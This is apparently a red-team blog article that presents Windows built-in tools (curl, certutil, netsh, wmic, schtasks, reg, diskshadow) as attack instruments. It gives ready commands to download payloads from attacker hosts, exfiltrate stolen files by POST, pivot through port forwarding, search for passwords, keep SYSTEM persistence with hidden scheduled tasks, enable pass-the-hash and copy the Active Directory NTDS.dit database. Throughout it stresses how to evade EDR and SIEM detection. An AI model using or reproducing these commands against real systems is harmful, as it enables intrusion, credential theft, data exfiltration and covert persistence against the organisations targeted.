As a Red Team member, your effectiveness depends on your ability to “live off the land” (LotL). If you rely on custom binaries and noisy C2 agents, modern defenses will catch you quickly. Instead, master the built-in command-line tools administrators use every day.
In this article, we’ll explore Windows CLI tools for advanced operations. We’ll cover both classic utilities (certutil, netsh) and the newer tools (curl, tar) Microsoft added to Windows 10/11, plus the stealthy power of diskshadow.
The New School: Curl and Tar#
Since Windows 10 build 1803, Microsoft includes native versions of curl.exe and tar.exe. This is a game-changer for Red Team members who relied on clunky PowerShell scripts for web requests or zip compression.
Curl: The Native Downloader/Uploader#
Unlike certutil, which defenders watch closely, curl often draws less attention because developers and admins use it for API testing.
:: Download a payload
curl.exe -o C:\Windows\Temp\update.exe http://10.10.10.5/beacon.exe
:: Exfiltrate data via POST (Stealthy!)
curl.exe -X POST -d @C:\Windows\Temp\loot.txt http://10.10.10.5/api/log_upload
Tar: Archive and Compress#
Stop writing PowerShell scripts just to create ZIP files.
:: Create a compressed archive of the Users folder
:: excluding AppData reduces size and prevents lock errors
tar.exe -cvf C:\Windows\Temp\logs.zip C:\Users\CEO\Documents
Certutil: The Ultimate (but Noisy) LOLBIN#
certutil.exe manages certificates, but a red team operator can repurpose it as a fast downloader and encoder.
[!WARNING]
certutil -urlcache -fis one of the most well-known signatures in EDR history. Use it only if you know the EDR is blind or offline.
Downloading a Remote payload#
certutil.exe -urlcache -split -f http://attacker.com/shell.exe C:\Windows\Temp\shell.exe
Encoding/Decoding Base64#
This is excellent for dropping a payload as a text file (to bypass email filters or file transfer blocks) and then reconstructing it on disk.
:: Attacker side
certutil.exe -encode payload.exe payload.txt
:: Victim side
certutil.exe -decode payload.txt payload.exe
Netsh: The Network Scalpel#
netsh lets you manipulate the host’s networking stack. This is critical for pivoting without external tools.
Port Forwarding (Pivoting)#
Forward traffic from the pivot host (port 4455) to a target domain controller (port 445).
netsh interface portproxy add v4tov4 listenport=4455 listenaddress=0.0.0.0 connectport=445 connectaddress=10.0.0.5
Firewall Rules (Opening the Gates)#
netsh advfirewall firewall add rule name="OpenPort" dir=in action=allow protocol=TCP localport=4455
WMIC: The Legacy Powerhouse#
Microsoft is deprecating WMIC in favor of PowerShell CIM cmdlets (and removing it from default installs in newer Windows 11 builds), but it still works well on most Windows Server versions (2016/2019/2022).
Process Creation (Lateral Movement)#
wmic /node:"10.0.0.5" process call create "cmd.exe /c whoami > C:\temp\out.txt"
Removing Software (Anti-Forensics / Cleanup)#
wmic product where name="VulnerableApp" call uninstall
Findstr: The Grep of Windows#
Searching for passwords in config files? findstr is your friend.
:: Recursive search for sensitive terms in text/config files
findstr /S /I /M "password secret key" *.xml *.config *.txt *.ini
/S: Recursive (subdirectories)./I: Case insensitive./M: Print only the filename (cleaner output).
Schtasks: Persistence via Scheduling#
Scheduled tasks are a reliable persistence mechanism because they can run with high privileges (SYSTEM) and survive reboots.
Creating a Periodic Task#
schtasks /create /tn "Microsoft\Windows\Recovery\CleanUp" /tr "C:\Windows\Temp\update.exe" /sc minute /mo 30 /ru "SYSTEM"
Hiding Tasks#
A common trick is to query the task index and delete the Security Descriptor (SD) in the registry to hide it from schtasks /query. (This is an advanced technique that requires registry manipulation.)
Reg: Direct Registry Manipulation#
When you can’t use PowerShell, the reg command is your friend.
Enabling RDP#
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
(Don’t forget to open the firewall with netsh!)
Disabling Restricted Admin (Turn ON PtH)#
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
Diskshadow: The Stealthy VSS Exploit#
vssadmin is noisy (Event ID 216 is flagged by most SIEMs). diskshadow.exe allows you to script Volume Shadow Copies to steal NTDS.dit (Active Directory Database) stealthily.
Create a script
shadow.txt:set context persistent nowriters add volume c: alias shadow_c create expose %shadow_c% z: exec "cmd.exe /c copy z:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit" delete shadows volume %shadow_c% resetRun it:
diskshadow.exe /s shadow.txt
Conclusion#
Mastering the Windows CLI isn’t about memorizing flags; it’s about understanding underlying system capabilities. When you use curl for transfers, diskshadow for data theft, and findstr for hunting secrets, you operate within the system’s own logic. This “live off the land” approach is a hallmark of professional red teaming.
Stay sharp, stay quiet, and keep your footprint small.
Happy hunting!